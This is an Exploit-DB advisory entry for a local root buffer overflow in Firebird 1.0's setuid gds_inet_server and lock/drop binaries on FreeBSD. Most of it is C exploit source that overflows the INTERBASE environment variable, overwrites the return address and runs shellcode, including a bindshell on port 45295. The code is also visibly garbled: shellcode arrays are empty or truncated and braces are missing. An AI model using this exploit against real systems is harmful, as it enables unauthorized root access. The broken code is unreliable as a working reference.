Firebird 1.0 GDS_Inet_Server Interbase Environment Variable Buffer Overflow Vulnerability

ID EDB-ID:22580
Type exploitdb
Reporter bob
Modified 2003-05-10T00:00:00


Firebird 1.0 GDS_Inet_Server Interbase Environment Variable Buffer Overflow Vulnerability. CVE-2002-2087. Local exploit for freebsd platform


Interbase is a database distributed and maintained by Borland. It is available for Unix and Linux operating systems. As Firebird is based on Borland/Inprise Interbase source code, it is very likely that Interbase is prone to this issue also.

A buffer overflow has been discovered in the setuid root program gds_inet_server, packaged with Firebird. This problem could allow a local user to execute the program with strings of arbitrary length. By using a custom crafted string, the attacker could overwrite stack memory, including the return address of a function, and potentially execute arbitrary code as root. 

/* DSR-olbird.c by

Same exploit as DSR-firebird.c apart from this version
exploits Firebird 1.0.0 which is shipped with freebsd.

[diif] ret addr && LEN [/diif]

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define LOCK    "/usr/local/firebird/bin/gds_lock_mgr"
#define DROP    "/usr/local/firebird/bin/gds_drop"
#define INET    "/usr/local/firebird/bin/gds_inet_server"
#define LEN     1032

char dropcode[]=

char inetcode[]=


char lockcode[]= 
	"\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80" //setuid[firebird] by bob
	"\x31\xc0\x31\xdb\x53\xb3\x06\x53" //fork() bindshell by eSDee

char *decide(char *string)
    if(!(strcmp(string, "1")))
      return((char *)&inetcode);
    if(!(strcmp(string, "2")))
      return((char *)&lockcode);
    if(!(strcmp(string, "3")))
      return((char *)&dropcode);

int main(int argc, char **argv)
	unsigned long ret = 0xbfbff75d;
	char *selectcode;
	char buffer[LEN];
	char egg[1024];
	char *ptr;
	int i=0;


	if(argc < 2)
		printf("( ( Firebird-1.0.2 Local exploit for Freebsd 4.7 ) )\n"); 
		printf("( (                           by - ) )\n");
		printf("Usage: %s <target#> \n", argv[0]);
		printf("1. [0xbfbff75c] - gds_inet_server\n");
		printf("2. [0xbfbff75d] - gds_lock_mgr\n");
		printf("3. [0xbfbff75e] - gds_drop\n");
	selectcode = (char *)decide(argv[1]);
  	memset(buffer, 0x41, sizeof(buffer));

        ptr = egg;

        for (i = 0; i < 1024 - strlen(selectcode) -1; i++) *(ptr++) = 0x90;
        for (i = 0; i < strlen(selectcode); i++) *(ptr++) = selectcode[i];
        egg[1024 - 1] = '\0';


        memcpy(&buffer[1028],(char *)&ret,4);
        buffer[1032] = 0;

        setenv("INTERBASE", buffer, 1);

        fprintf(stdout, "Return Address: 0x%x\n", ret);
        fprintf(stdout, "Buffer Size: %d\n", LEN);
        fprintf(stdout, "Setuid [90]\n");

if(selectcode == (char *)&inetcode)
	execl(INET, INET, NULL);
	return 0;

if(selectcode == (char *)&lockcode)
 	printf("\nShell is on port 45295\nExploit will hang!\n");
	execl(LOCK, LOCK, NULL);
	return 0;

if(selectcode == (char *)&dropcode)
	execl(DROP, DROP, NULL);
	return 0;

	return 0;